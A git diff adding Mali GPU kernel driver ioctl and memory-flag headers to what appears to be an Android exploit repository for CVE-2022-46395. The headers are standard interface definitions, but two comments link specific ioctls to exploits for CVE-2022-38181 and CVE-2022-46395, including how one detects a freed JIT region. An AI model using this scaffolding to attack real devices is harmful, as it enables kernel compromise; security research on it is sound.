See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + */ +struct kbase_kinstr_jm_fd_in { + __u16 count; + __u8 padding[6]; +}; + +union kbase_kinstr_jm_fd { + struct kbase_kinstr_jm_fd_in in; + struct kbase_kinstr_jm_fd_out out; +}; + +#define KBASE_IOCTL_KINSTR_JM_FD \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd) + + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. 
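+ *
+ * For example, KBASE_MEM_QUERY_COMMIT_SIZE returns the number of physical
+ * pages currently backing the region; the CVE-2022-38181 exploit in this
+ * repository polls this value to detect that its JIT region has been freed.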
+ */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection + * @dump_buffer: GPU address to write counters to + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + */ +struct kbase_ioctl_hwcnt_enable { + __u64 dump_buffer; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_ENABLE \ + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable) + +#define KBASE_IOCTL_HWCNT_DUMP \ + _IO(KBASE_IOCTL_TYPE, 10) + +#define KBASE_IOCTL_HWCNT_CLEAR \ + _IO(KBASE_IOCTL_TYPE, 11) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. 
+ */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. 
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. 
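+ *
+ * Imports of type BASE_MEM_IMPORT_TYPE_USER_BUFFER are the path exercised by
+ * the mali_user_buf.c exploit for CVE-2022-46395 in this directory.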
+ */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input 
parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. 
+ * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define 
KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 + +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) + +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h new file mode 100644 index 0000000..5edc780 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h @@ -0,0 +1,1220 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
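The KBASE_GPUPROP_VALUE_SIZE_* codes hint at how the property IDs above reach userspace: in the usual kbase scheme, the get-gpuprops ioctl (declared elsewhere in the driver's UAPI, not in this excerpt) fills a buffer with packed pairs, each a little-endian __u32 key of (property_id << 2) | size_code followed by a 1-, 2-, 4- or 8-byte value. A hedged decoder sketch assuming exactly that layout (needs <stdio.h>, <string.h>, <stdint.h>):

static void dump_gpuprops(const uint8_t *buf, size_t len)
{
    size_t i = 0;
    while (i + 4 <= len) {
        uint32_t key;
        memcpy(&key, buf + i, 4);
        i += 4;
        size_t n = (size_t)1 << (key & 3);  /* KBASE_GPUPROP_VALUE_SIZE_* */
        if (i + n > len)
            break;
        uint64_t val = 0;
        memcpy(&val, buf + i, n);           /* little-endian value */
        i += n;
        printf("prop %u = 0x%llx\n", key >> 2, (unsigned long long)val);
    }
}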
+ * + */ + +#ifndef _UAPI_BASE_JM_KERNEL_H_ +#define _UAPI_BASE_JM_KERNEL_H_ + +#include <linux/types.h> + +typedef __u32 base_mem_alloc_flags; +/* Memory allocation, access/hint flags. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * 